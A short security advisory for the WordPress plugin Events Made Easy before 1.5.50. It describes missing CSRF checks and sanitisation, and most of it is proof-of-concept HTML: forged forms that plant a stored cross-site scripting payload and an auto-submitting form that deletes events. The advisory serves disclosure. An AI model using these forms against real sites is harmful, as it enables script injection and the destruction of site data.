Events Made Easy < 1.5.50 – Multi CSRF to Stored Cross-Site Scripting & Event Deletion

Description

The plugin was missing CSRF check in some actions, as well as sanitisation, allowing attacker to make logged in admin create Template and Form Field with Cross-Site Scripting payloads in them, as well as delete arbitrary events.

Proof of Concept

<form action="https://example.com/wp-admin/admin.php?page=eme-templates" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addtemplate" />
<input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="format" value="csrf" />
<input type="submit" name="submit" value="Add template" />
</form>

<form action="https://example.com/wp-admin/admin.php?page=eme-formfields" method="POST">
<input type="hidden" name="eme_admin_action" value="do_addformfield" />
<input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
<input type="hidden" name="field_type" value="1" />
<input type="hidden" name="field_info" value="csrf" />
<input type="hidden" name="field_tags" value="csrf" />
<input type="submit" name="submit" value="Add field" />
</form>

<form action="https://example.com/wp-admin/admin.php?page=eme-cleanup" name="dsopas" method="POST">
<input type="hidden" name="page" value="eme-cleanup" />
<input type="hidden" name="eme_admin_action" value="eme_cleanup" />
<input type="hidden" name="eme_number" value="1" />
<input type="hidden" name="eme_period" value="day" />
<input type="hidden" name="doaction" value="Apply" />
</form> <script> document.dsopas.submit(); </script>